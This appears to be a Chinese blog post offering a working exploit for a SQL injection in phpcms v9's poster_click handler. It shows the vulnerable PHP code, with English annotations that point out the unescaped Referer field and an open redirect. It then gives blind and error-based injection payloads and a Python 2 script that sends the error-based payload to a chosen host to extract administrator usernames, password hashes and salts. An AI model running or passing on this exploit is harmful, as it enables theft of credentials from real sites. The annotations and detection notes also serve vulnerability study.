有人放出了phpcmsv9的0day,就随手写了个利用代码,其中注入代码有两种形式:
问题函数\phpcms\modules\poster\index.php
/**
 * Record a click on a poster (advert) row and redirect the visitor to its link.
 *
 * Reads the poster id from $_GET['id'], looks the row up in $this->db, writes a
 * click record to $this->s_db, bumps the row's click counter and finally emits a
 * Location header.
 *
 * @return bool false when no row matches the id; otherwise the method ends after
 *              sending the redirect header (no explicit return value).
 */
public function poster_click() {
	// Integer-coerced request parameter: safe as a numeric key.
	$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
	$r = $this->db->get_one(array('id'=>$id));
	if (!is_array($r) && empty($r)) return false;
	$ip_area = pc_base::load_sys_class('ip_area');
	// Client address via the framework's ip() helper (definition not shown here).
	$ip = ip();
	$area = $ip_area->get($ip);
	// Cookie-supplied value. No sanitisation is applied in this method; whatever
	// param::get_cookie() does to it is not visible here — treat as untrusted.
	$username = param::get_cookie('username') ? param::get_cookie('username') : '';
	if($id) {
		$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
		// Click record. Only 'siteid' and 'pid' are integer-coerced; 'username',
		// 'area' and 'referer' go in as raw strings. HTTP_REFERER carries the
		// request's Referer header (see the writeup above) and is stored
		// verbatim — this method applies no escaping, and the writeup reports
		// that the insert wrapper does not either, which is the SQL injection
		// this page describes. Any fix belongs at this sink or in the wrapper.
		$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
	}
	// '+=1' is presumably turned into an increment expression by the db
	// wrapper — not visible from this method.
	$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
	$setting = string2array($r['setting']);
	if (count($setting)==1) {
		$url = $setting['1']['linkurl'];
	} else {
		// With more than one setting entry the redirect target is taken
		// unvalidated from $_GET['url'], so the Location header below can be
		// pointed anywhere by the request (attacker-controlled redirect).
		$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
	}
	header('Location: '.$url);
}
利用方式:
1、可以采用盲注入的手法:
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
通过返回页面正常与否,一个个猜解密码字段。
2、代码是花开写的,随手附上了:
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
此方法是报错注入手法,原理自查。
利用程序:
#!/usr/bin/env python
# Python 2 script: uses print statements and the httplib module (renamed
# http.client in Python 3), so it does not run under Python 3 as written.
import httplib,sys,re
def attack():
    """Send one request to a phpcms v9 poster_click endpoint and print the
    ``Duplicate entry`` fragment found in the response.

    Host comes from ``sys.argv[1]`` and the install path from ``sys.argv[2]``;
    nothing is returned. This is the error-based variant (method 2) from the
    writeup above, delivered through the Referer header.
    """
    print “Code by Pax.Mac Team conqu3r!”
    print “Welcome to our zone!!!”
    url=sys.argv[1]
    paths=sys.argv[2]
    conn = httplib.HTTPConnection(url)
    # The Referer value is the injection string quoted in the writeup — the same
    # header poster_click() stores unescaped. From a detection standpoint, a
    # Referer containing SQL keywords and a trailing '#' on a request to
    # m=poster&c=index&a=poster_click is the observable signature of this probe.
    i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
    “Accept”: “text/plain”,
    “Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
    conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
    r1 = conn.getresponse()
    datas=r1.read()
    # The technique relies on the database error text being echoed back to the
    # client; a server that does not display errors yields no match, and the
    # datas[0] below then raises IndexError (the script has no guard for that).
    datas=re.findall(r”Duplicate entry \’\w+’”, datas)
    print datas[0]
    conn.close()
if __name__==”__main__”:
    # Both positional arguments (host, install path) are required; otherwise
    # print the usage text and exit non-zero. The "Usgae" spelling is the
    # original author's output string and is left as-is.
    if len(sys.argv)<3:
        print “Code by Pax.Mac Team conqu3r”
        print “Usgae:”
        print “ phpcmsattack.py www.paxmac.org /”
        print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
        sys.exit(1)
    attack()